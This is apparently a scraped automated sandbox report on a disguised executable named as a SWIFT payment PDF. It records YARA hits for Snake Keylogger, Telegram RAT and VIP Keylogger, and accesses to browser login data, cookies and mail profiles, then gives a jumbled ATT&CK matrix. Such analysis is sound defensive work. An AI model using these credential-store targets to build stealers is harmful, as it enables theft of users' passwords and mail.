                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		111
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Security Software Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS31
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging15
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Network Configuration Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync13
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.